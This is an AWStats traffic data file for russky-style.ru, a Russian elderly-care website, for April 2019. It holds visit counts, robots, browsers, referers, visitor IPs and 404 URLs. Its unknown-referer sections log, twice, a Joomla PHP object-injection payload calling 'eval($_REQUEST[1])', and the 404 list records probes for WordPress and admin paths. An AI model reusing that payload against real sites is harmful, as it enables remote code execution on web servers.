AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201904 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.russky-style.ru.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1995                
POS_TIME 2673                
POS_VISITOR 12351               
POS_DAY 22626               
POS_DOMAIN 3579                
POS_LOGIN 3812                
POS_ROBOT 3967                
POS_WORMS 4556                
POS_EMAILSENDER 4687                
POS_EMAILRECEIVER 4830                
POS_SESSION 23090               
POS_SIDER 23291               
POS_FILETYPES 4965                
POS_DOWNLOADS 5217                
POS_OS 5319                
POS_BROWSER 5484                
POS_SCREENSIZE 6994                
POS_UNKNOWNREFERER 7068                
POS_UNKNOWNREFERERBROWSER 8372                
POS_ORIGIN 9237                
POS_SEREFERRALS 9379                
POS_PAGEREFS 9556                
POS_SEARCHWORDS 10105               
POS_KEYWORDS 10271               
POS_MISC 2336                
POS_ERRORS 10344               
POS_CLUSTER 3668                
POS_SIDER_404 10483               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20190415114650 168 36377 9598841398129
FirstTime 20190401010037
LastTime 20190415105652
LastUpdate 20190415120413 7 0 7 0 0
TotalVisits 353                 
TotalUnique 246                 
MonthHostsKnown 0                   
MonthHostsUnknown 258                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 55 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 26 83 3337396 106 146 1218745
1 29 32 1116137 72 91 710900
2 27 186 7055227 109 174 1203545
3 22 194 7652877 96 139 798151
4 33 33 1110234 104 130 1523023
5 31 37 1965797 95 127 1363060
6 34 183 6974715 87 148 1632760
7 33 155 5336686 102 135 891943
8 34 40 1545629 105 152 1784005
9 60 112 3582180 111 157 1365206
10 81 295 10875890 126 179 1998012
11 30 129 4669977 89 124 858558
12 22 25 954470 86 137 1187072
13 30 83 3133703 105 141 1565282
14 27 84 3740761 104 148 1636602
15 92 626 21747619 115 263 4721504
16 32 126 3639358 90 123 1869816
17 51 211 7538467 124 173 2043201
18 46 196 6182635 105 140 495612
19 39 43 1633735 89 116 1149921
20 27 93 3490903 91 174 2866412
21 29 127 4683745 123 148 1487172
22 47 100 4052400 112 155 1008529
23 22 71 2526346 90 134 977020
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 904 3264 118546887
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 12
yandex 1184 14069829 20190415114650 298
bot[\s_+:,\.\;\/\\-] 374 17018779 20190415105438 40
googlebot 154 3114455 20190414195937 27
[\s_+:,\.\;\/\\-]bot 30 166430 20190409215425 0
mail\.ru 16 118682 20190415114033 4
spider 8 383905 20190404064312 2
no_user_agent 7 232924 20190411151124 0
crawl 6 46191 20190412080121 0
unknown 5 805 20190413113115 5
python 4 150602 20190411220625 0
netcraft 2 74454 20190404123338 0
w3c_validator 1 7674 20190411155123 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 9
css 92 2326854 0 0
png 1069 910288 0 0
woff2 107 6929564 0 0
woff 13 1167060 0 0
php 193 5545782 0 0
html 170 2953149 0 0
jpg 1116 71500578 0 0
js 83 15704725 0 0
Unknown 421 11508887 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 2
/robots.txt 317 0 78809
/public/robots.txt 59 0 13527
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 11
linuxandroid 486
winlong 6
winxp 17
win2000 1
winnt 688
linuxubuntu 53
winvista 189
linux 176
win7 872
macosx 683
Unknown 93
END_OS

# Browser ID - Hits
BEGIN_BROWSER 79
chrome64.0.3282.0 2
firefox66.0 18
msie6.0 1
firefox57.0 53
chrome52.0.2743.116 1
firefox44.0 2
chrome73.0.3683.88 88
chrome72.0.3626.121 17
chrome31.0.1650.57 1
firefox54.0 3
chrome58.0.3029.110 3
chrome50.0.2661.94 1
chrome42.0.2311.90 2
chrome34.0.1847.132 2
firefox59.0 1
msie7.0 1
chrome73.0.3800.0 1
firefox65.0 1
chrome66.0.3359.181 48
chrome70.0.3538.102 28
chrome42.0.2311.152 4
chrome73.0.3683.103 271
chrome49.0.2623.112 14
chrome65.0.3325.181 24
msie5.01 1
firefox48.0 1
firefox42.0 8
wap 1
chrome68.0.3440.106 78
chrome63.0.3239.132 51
firefox38.0 1
safari12.1 50
chrome49.0.2623.75 2
firefox45.0 2
firefox47.0 5
firefox36.0.4 1
firefox25.0 1
mozilla 34
chrome68.0.3440.84 31
chrome22.0.1229.94 55
chrome44.0.2403.89 1
chrome73.0.3683.90 214
safari 53
chrome67.0.3396.87 110
safari7.0 55
safari11.0 53
android 110
chrome43.0.2327.5 4
chrome68.0.3440.75 14
chrome48.0.2564.116 1
safari12.0 324
chrome67.0.3396.79 40
chrome71.0.3578.98 224
firefox24.0 3
chrome61.0.3163.128 109
opera9.80 50
chrome57.0.2987.108 53
firefox62.0 13
chrome61.0.3163.100 11
chrome26.0.1410.65 1
chrome34.0.1847.116 6
chrome53.0.2785.116 125
Unknown 14
chrome72.0.3626.109 51
chrome73.0.3683.75 106
safari9.0.3 1
safari10.0 52
chrome73.0.3683.86 53
firefox3.6.2 1
chrome51.0.2704.79 87
firefox61.0 91
chrome67.0.3396.99 58
chrome48.0.2564.109 1
msie10.0 103
chrome69.0.3497.100 50
chrome66.0.3359.170 60
chrome65.0.3325.146 8
chrome67.0.3396.62 19
chrome64.0.3282.140 26
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 11
2ip.ru_CMS_Detector_(https://2ip.ru/cms/) 20190411151204
Go-http-client/2.0 20190410163153
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20190413120319
}__test|O:21:\ 20190406105217
Mozilla/5.0_(compatible;_WebDataStats/1.0_;__https://webdatastats.com/policy.html) 20190405091442
Mozilla/5.0_(compatible;_Wappalyzer) 20190410140842
Validator.nu/LV_http://validator.w3.org/services 20190411155125
Bitrix_link_preview 20190411150930
Mozilla/5.0_(compatible;_BackupLand/1.0;_https://go.backupland.com/;_Domain_check_for_viruses;) 20190414005100
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:46:\x22eval($_REQUEST[1]);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86 20190406105234
Opera/9.80_(Android;_Opera_Mini/6.5.27049/28.2794;_U;_ru)_Presto/2.8.119_Version/11.10 20190401033746
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 6
Validator.nu/LV_http://validator.w3.org/services 20190411155125
2ip.ru_CMS_Detector_(https://2ip.ru/cms/) 20190411151204
Bitrix_link_preview 20190411150930
Go-http-client/2.0 20190410163153
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:46:\x22eval($_REQUEST[1]);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86 20190406105234
}__test|O:21:\ 20190406105217
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 96 103
From1 0 0
From2 59 66
From3 22 25
From4 727 3070
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 3
google 5 5
bing 0 2
yandex 54 59
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 10
https://away.vk.com/away.php 4 4
http://link.2gis.ru/855D4918/v4-iphone/20190401/spb/70000001023289971 3 3
https://vk.com/skvortsova2019 3 3
https://allpans.ru/pansionats/dom-prestarelyh-russkij-stil/ 3 3
http://lookover.ru 3 3
http://whatsappbot.flyland.ru 3 3
http://away.vk.com/away.php 2 2
http://zoon.ru/redirect/ 1 1
https://jlb.bitrix24.ru/desktop_app/ 0 2
https://jlb.bitrix24.ru/stream/ 0 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
parsinfo.ru 5
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 1
parsinfo.ru 5
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
302 149 63704
499 19 0
206 1 7676
404 84 472928
301 1455 394336
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 53
/articles/7 2 -
/public//blog/wp-includes/wlwmanifest.xml 1 -
/public//wp-includes/wlwmanifest.xml 1 -
/google7c50f4c3cd771bc8.html 1 -
/public//test/wp-includes/wlwmanifest.xml 1 -
/galery 2 -
/public//site/wp-includes/wlwmanifest.xml 1 -
/Y48cec4rtLB 1 -
/news/22 2 -
/public//cms/wp-includes/wlwmanifest.xml 1 -
/otzyvy 5 -
/public//shop/wp-includes/wlwmanifest.xml 1 -
/wp-admin 1 -
/netcat 1 -
/PRORW7KDXRgpFGTwFWh 1 -
/public//dbs.php 1 -
/articles/2 2 -
/public//2016/wp-includes/wlwmanifest.xml 1 -
/album 2 https://russky-style.ru/album/
/modx/manager 1 -
/public//2018/wp-includes/wlwmanifest.xml 1 -
/qbFbsV7OM25YZ 1 -
/public//website/wp-includes/wlwmanifest.xml 1 -
/public//sito/wp-includes/wlwmanifest.xml 1 -
/img%20%0D%0A%20%20%20%20%20%20%20%20%3Cspan%20class= 2 -
/public//wordpress/wp-includes/wlwmanifest.xml 1 -
/public//wp/wp-includes/wlwmanifest.xml 1 -
/map 5 -
/prices 6 -
/this_page_is_not_exist_i_am_sure 1 -
/public//web/wp-includes/wlwmanifest.xml 1 -
/public//2017/wp-includes/wlwmanifest.xml 1 -
/articles/6 2 -
/articles/3 2 -
/articles/9 2 -
/public//connectors/system/phpthumb.php 1 -
/news/nasha-filmoteka 1 -
/reviews 2 -
/servises/meal 2 -
/public//2015/wp-includes/wlwmanifest.xml 1 -
/bitrix/admin 1 -
/public//wp2/wp-includes/wlwmanifest.xml 1 -
/administrator 1 -
/public//wp1/wp-includes/wlwmanifest.xml 1 -
/public//media/wp-includes/wlwmanifest.xml 1 -
/home 5 -
/news/21 2 -
/manager 1 -
/articles/5 2 -
/articles/8 2 -
/public//news/wp-includes/wlwmanifest.xml 1 -
/engine/print.php 1 -
/public//xmlrpc.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 258
5.8.47.2 81 81 2730456 20190415022807
5.8.46.2 35 35 1183954 20190415070132
5.8.45.2 22 22 739381 20190414213620
91.122.31.125 19 160 4606118 20190409152558
213.170.113.94 19 152 5535820 20190411151223
5.188.210.51 18 18 586879 20190407111712
91.134.253.113 17 17 532566 20190406033412
185.86.93.42 17 17 123327 20190405091442
193.107.1.21 14 87 3297581 20190411105425
122.49.28.2 12 110 4313964 20190412060900
167.99.66.175 1 1 7700 20190413150155
59.58.137.183 3 3 101128 20190401053359
188.255.16.249 1 3 206599 20190413051236
46.118.156.79 3 3 101128 20190401174717
148.251.186.75 2 2 15373 20190407225031
90.154.46.82 1 3 206589 20190411133128
46.188.31.187 1 50 1834611 20190406203114
176.8.88.150 3 3 101128 20190401010040
77.233.21.209 3 3 101128 20190404090629
95.27.165.33 0 1 8833 
195.62.62.248 1 1 7685 20190405100731
92.53.91.100 1 1 37885 20190402172452
31.173.81.149 8 8 155351 20190405115310
46.55.23.55 1 1 7688 20190404225442
85.235.65.198 1 1 31758 20190402062330
195.208.185.249 1 2 170173 20190411150930
188.32.140.245 2 2 75210 20190402170348
37.187.129.166 1 1 37605 20190410140842
37.204.188.209 1 3 206613 20190405171317
195.201.201.32 6 6 37661 20190411151204
82.102.18.131 2 2 62523 20190412040055
95.221.171.116 1 3 206614 20190414004747
178.159.37.4 9 9 303384 20190415090535
146.52.110.124 4 52 2028580 20190415105652 20190415105649 /fonts/vendor/materialize-css/dist/roboto/Roboto-Medium.woff2
188.170.80.79 4 53 2029140 20190413171213
79.111.48.195 1 3 203598 20190410161707
217.118.86.60 1 1 7688 20190412064144
128.72.24.255 1 28 405876 20190402162202
37.204.17.67 1 3 206588 20190407081442
66.249.87.48 1 1 70 20190413080718
176.59.21.2 4 53 2029124 20190410164706
178.137.80.124 6 6 202256 20190414171535
178.137.17.200 8 8 155351 20190404150839
176.120.237.112 8 8 155351 20190411183010
5.165.44.160 1 3 206587 20190404143457
109.234.37.86 1 1 37605 20190404192333
185.154.13.154 1 1 7675 20190413014004
176.193.141.91 1 3 206613 20190403103744
82.102.18.62 2 2 62523 20190406212417
109.184.230.178 8 8 263045 20190415050736
80.89.156.213 1 1 7673 20190409150209
193.201.224.209 1 1 37885 20190404063332
46.119.114.82 3 3 101128 20190405172009
128.30.52.134 1 1 7673 20190411155125
176.193.136.1 1 3 206586 20190403001058
91.221.199.72 4 125 5125246 20190408031551
87.242.74.135 3 3 111681 20190404054615
40.77.193.43 0 1 514935 
178.32.52.218 1 1 7699 20190415103052
46.246.65.137 5 5 164098 20190406131504
46.119.115.20 3 3 101128 20190401095346
178.176.113.180 3 3 112815 20190412210753
46.118.157.179 1 1 37605 20190413225458
2.132.172.210 1 1 7675 20190402020215
5.105.196.36 1 1 37885 20190412073504
54.186.187.126 1 1 7672 20190404075729
158.69.252.227 1 1 37605 20190413221222
46.246.65.139 10 10 328196 20190407072912
46.118.158.133 3 3 101128 20190402192529
185.130.184.208 2 2 62523 20190408094341
188.244.32.76 1 3 205254 20190401150023
195.154.191.141 1 1 37885 20190410134331
64.246.165.170 1 1 7674 20190412004948
90.154.93.189 2 6 413174 20190409193223
95.221.51.215 1 3 206585 20190410220555
159.69.76.179 1 1 7686 20190405010013
94.180.243.158 5 5 164098 20190415102447
92.240.130.107 5 5 162378 20190403124631
46.242.32.245 0 1 11907 
93.84.229.10 4 4 139013 20190408135713
185.12.124.78 8 8 61489 20190414005100
31.146.227.124 4 53 2104672 20190408151010
52.53.201.78 6 6 46041 20190413181758
59.9.253.148 1 1 7700 20190413144122
52.165.154.2 1 1 144 20190413122702
196.52.84.22 3 3 101128 20190403175751
46.246.65.132 5 5 164098 20190411233004
40.77.189.14 0 1 125473 
95.28.190.165 1 3 206589 20190414192150
34.221.123.94 1 1 7686 20190409015402
109.184.219.28 3 3 101128 20190408120113
5.18.249.26 10 109 4150917 20190402024046
188.124.242.84 3 3 101128 20190404130351
5.3.191.201 1 3 206614 20190405021340
37.204.4.249 2 6 411754 20190402050626
31.184.238.93 9 9 296984 20190413014452
178.62.82.141 6 6 33832 20190409174149
176.214.131.48 3 3 113655 20190401082057
185.220.101.28 1 1 37885 20190410172004
68.183.16.92 1 1 7698 20190413144646
94.180.129.44 5 5 164098 20190406190807
138.68.254.101 4 53 2029140 20190409215535
188.170.80.249 5 45 1389787 20190408075624
51.83.77.15 1 1 153 20190403145914
91.202.46.34 9 91 3369015 20190411071711
188.163.109.153 5 5 158517 20190406142312
40.77.189.182 0 1 514935 
185.195.237.25 3 3 101128 20190410041534
204.85.191.8 2 2 69370 20190408132951
62.152.85.106 8 106 2781144 20190409185150
37.214.50.134 3 3 101128 20190409233148
134.249.50.180 3 3 101128 20190412040540
77.83.173.49 3 3 101128 20190402093230
176.8.88.109 3 3 101128 20190403045510
104.238.177.61 1 1 37885 20190412121732
128.72.158.251 1 3 206590 20190402031249
145.255.21.218 6 6 201983 20190402061322
188.234.35.226 5 5 164098 20190414192818
5.188.210.35 1 1 37885 20190407034904
185.193.125.42 1 1 31758 20190408132957
178.137.91.174 3 3 101128 20190415080320
185.130.184.243 2 2 62523 20190413163645
93.80.36.247 1 50 1834636 20190401150908
178.140.212.181 0 1 13545 
192.171.244.194 4 53 2029137 20190402104442
5.188.44.47 1 2 120003 20190411015751
176.214.2.54 1 3 206587 20190407081442
46.242.111.254 1 3 206614 20190406202302
80.67.172.162 2 2 69370 20190402062327
95.84.145.219 2 13 220688 20190412171212
94.41.130.155 5 5 164098 20190415004849
178.122.81.25 1 1 37885 20190412045303
65.19.167.131 3 3 101128 20190410045812
5.188.210.44 7 7 236861 20190405180534
91.108.29.87 0 1 132946 
192.99.15.139 6 6 76064 20190406105246
96.44.172.77 1 1 37605 20190404070140
46.0.122.96 3 3 100128 20190407111033
185.153.196.157 1 1 37605 20190407154159
109.184.145.43 3 3 101128 20190412165827
94.29.38.34 3 3 112815 20190412051954
40.77.194.37 0 1 514935 
178.71.45.80 1 1 37227 20190401034154
5.77.30.19 1 1 37605 20190402160305
153.122.53.217 1 1 7698 20190401153032
46.42.161.152 1 3 205058 20190408184553
80.252.154.233 3 3 100128 20190407015240
93.124.95.219 1 1 37605 20190415085621
46.147.221.8 1 3 206588 20190407081442
188.163.102.127 4 53 2029125 20190411222856
148.251.182.122 1 1 7690 20190410233413
31.202.101.40 1 1 37605 20190410121415
213.166.70.62 1 1 31485 20190402154802
185.130.184.209 4 4 125046 20190413163654
95.79.186.199 10 10 328196 20190403101912
88.198.39.184 1 1 7670 20190412155840
69.12.66.205 1 1 144 20190410002713
213.170.113.33 5 59 2099397 20190411151545
111.206.52.124 2 2 15347 20190413114810
94.242.224.198 1 1 7686 20190414071952
40.77.192.209 0 1 125473 
51.83.77.136 1 1 153 20190401170821
146.120.70.226 4 53 2029137 20190411141018
95.221.157.193 1 3 206614 20190406005205
77.81.235.148 1 1 7697 20190413145331
176.59.202.11 2 2 74832 20190410100800
212.98.180.98 1 1 37885 20190405044121
162.247.74.7 3 3 101128 20190405223916
91.238.74.15 5 5 164098 20190412225515
176.59.22.131 2 14 556558 20190410203906
79.105.6.10 3 3 89546 20190405164617
31.173.81.102 8 8 155351 20190402220416
89.70.109.6 1 1 37885 20190402183514
144.217.166.26 3 3 101128 20190410215746
185.19.20.233 1 50 1834638 20190401033741
93.80.129.106 1 3 206612 20190405101523
188.32.229.11 1 3 206587 20190413124359
128.72.159.196 1 3 206614 20190405142342
109.70.100.23 3 3 101128 20190409164602
185.130.184.222 4 4 125046 20190411014917
91.207.57.122 2 2 69370 20190414132026
84.232.181.3 1 1 7698 20190404135255
37.115.191.192 3 3 101128 20190405014419
217.66.152.108 4 53 2029122 20190413103557
5.19.7.237 4 53 2029125 20190411235929
188.191.239.154 3 3 101128 20190402212955
104.148.64.26 4 4 30799 20190415084313
199.249.230.76 2 2 63243 20190410172018
46.118.125.166 3 3 101128 20190402201813
82.208.101.166 1 1 30758 20190403172824
178.16.153.114 7 56 2108975 20190411115859
144.76.175.75 6 55 2283126 20190412185616
46.254.219.121 1 3 206589 20190408202956
109.120.5.2 3 3 76144 20190409055732
95.79.239.108 10 10 328196 20190414101830
109.174.112.34 1 1 7674 20190401232539
193.110.76.12 3 3 100128 20190411081731
185.189.186.18 1 1 37885 20190410102046
46.118.155.158 3 3 101128 20190405003849
85.91.193.78 1 50 1834639 20190404061540
178.140.215.249 1 3 206658 20190413135610
185.189.113.44 4 4 125046 20190410101916
94.137.52.35 1 50 1834614 20190405211906
5.188.210.9 1 1 37885 20190406090637
77.233.21.31 3 3 101128 20190413050121
185.130.184.237 2 2 62523 20190402193005
176.36.21.189 5 5 189425 20190414081942
109.184.218.58 2 2 61789 20190402204216
178.137.18.130 3 3 101128 20190405035320
90.188.236.43 3 3 101128 20190408043405
149.202.201.119 1 1 7699 20190413145106
62.210.83.78 1 1 7688 20190408020015
37.204.37.15 1 50 1834637 20190406134024
60.191.38.77 4 4 149664 20190408221051
2.94.230.165 4 53 2029137 20190412175359
193.169.252.10 1 1 37885 20190412075958
93.120.198.247 1 1 37885 20190413214127
94.25.229.33 5 54 2036803 20190414091355
188.170.83.177 4 53 2029140 20190413155031
95.216.112.32 1 1 144 20190402005204
185.17.149.136 2 2 62523 20190410094646
37.204.9.196 2 21 465111 20190414164305
176.57.220.156 1 1 37227 20190414075242
82.102.18.148 2 2 62523 20190401221955
82.102.18.41 2 2 62523 20190404081201
95.220.28.26 1 3 206616 20190412094648
157.55.195.96 8 8 155351 20190408104812
46.246.65.166 5 5 164098 20190404225045
109.234.39.208 1 1 136 20190404100827
93.185.30.240 4 53 2029140 20190414004828
193.169.52.39 2 2 15372 20190414032926
95.55.103.120 1 1 37227 20190402221606
95.55.162.60 1 50 1834624 20190401181715
89.185.76.152 1 1 7688 20190411050630
95.211.226.77 1 1 7687 20190401234237
91.189.112.7 5 5 188025 20190414171330
109.184.178.165 3 3 100128 20190410230055
95.174.106.164 4 53 2029140 20190403115617
31.8.73.52 0 2 196430 
149.202.170.60 3 3 101128 20190405174205
13.57.233.99 5 5 38365 20190414222800
212.92.101.197 1 1 37605 20190408055824
109.184.166.84 3 3 101128 20190410143418
27.153.239.6 3 3 101128 20190407041047
66.249.87.46 2 2 7771 20190413120319
190.97.165.116 3 3 101128 20190409003224
37.112.36.167 1 3 203380 20190401013556
31.184.238.9 3 3 101128 20190410185649
35.229.203.114 1 1 7700 20190413145835
185.130.184.206 2 2 62523 20190410095554
46.246.65.136 5 5 164098 20190413052000
46.147.171.158 1 3 206614 20190410064919
88.99.97.146 6 55 2283113 20190411151136
128.72.180.100 0 1 12208 
54.202.158.227 1 1 7675 20190410163153
136.243.95.154 1 1 37227 20190408185155
5.8.180.223 5 56 2033912 20190412155135
40.77.193.191 0 1 125473 
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 15
20190401 49 202 7446555 25
20190402 101 281 9604508 39
20190403 65 120 4510944 24
20190404 39 90 3036163 18
20190405 81 189 6622415 29
20190406 47 149 5319870 18
20190407 42 49 1864257 18
20190408 54 268 10167720 22
20190409 60 303 9036557 16
20190410 55 126 5438027 31
20190411 108 699 26005142 26
20190412 64 327 12166497 24
20190413 52 205 7564746 30
20190414 55 174 6207658 22
20190415 32 82 3555828 11
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
5mn-15mn 3
30s-2mn 6
0s-30s 338
2mn-5mn 3
15mn-30mn 1
30mn-1h 1
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 49
/public/index.php/comments 253 7995735 6 107
/public/index.php 183 5544428 162 55
/public/ 86 1917640 76 47
/ 77 1034183 63 48
/public/comments 56 1749825 15 26
/fonts/vendor/materialize-css/dist/roboto/Roboto-Light.woff2 32 2056576 0 9
/fonts/vendor/materialize-css/dist/roboto/Roboto-Medium.woff2 31 2027772 0 5
/fonts/vendor/materialize-css/dist/roboto/Roboto-Regular.woff2 31 2009792 0 3
/comments 31 910035 12 15
/public/index.php/vopros-otvet 20 368840 0 5
/public/new/noviy-pitometz-v-pansionate-russky-style 2 11859 0 0
/articles 1 6340 1 1
/public/albums 6 24918 0 0
/servises 2 13625 1 1
/contacts 6 24117 1 3
/google490c4d05a7dd366a.html 1 70 1 1
/article/sizialnaya-adaptazia-v-pansionate-dlya-pozhilyh 1 6226 1 1
/article/kak-podobrat-pansionat-dlya-pozhilykh 1 7744 1 1
/public/google490c4d05a7dd366a.html 1 70 1 1
/public/contacts 3 32698 0 2
/public/album/leto-2017 1 5725 0 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Thin.woff2 4 252224 0 1
/public/index.php/contacts 15 218490 0 0
/servises/narushenia-zrenia 1 6535 1 1
/public/servises 1 6823 0 1
//administrator/ 2 913 0 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Bold.woff 2 180616 0 2
/fonts/vendor/materialize-css/dist/roboto/Roboto-Light.woff 3 269016 0 1
/new/vystuplenie-hora 1 4684 1 1
/rooms 3 18811 1 1
/public/album/nashi-budni 2 9136 0 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Regular.woff 3 269484 0 0
/administrator/index.php 3 460 2 2
/public/album/nashi-prazdniki 1 4692 0 0
/public/about 2 30186 0 0
/public/news 1 5159 0 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Medium.woff 3 271680 0 0
/admin 1 139 0 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Thin.woff 2 176264 0 0
/album/nashi-budni 1 4562 0 0
/article/razvlechenia-dlya-pozhilyh-v-pansionate 1 6193 1 0
/fonts/vendor/materialize-css/dist/roboto/Roboto-Bold.woff2 9 583200 0 2
//administrator/webconfig.txt.php 2 319 0 0
/article/uhod-za-bolnymi-v-pozhilom-vozraste 1 6144 1 1
/wp-login.php 5 575 3 3
/new/shahmatnyj-turnir 1 4466 1 1
/albums 5 20726 0 1
/admin/ 3 273 1 2
/public/new/vystuplenie-detskogo-ansamblya 1 4454 0 0
END_SIDER
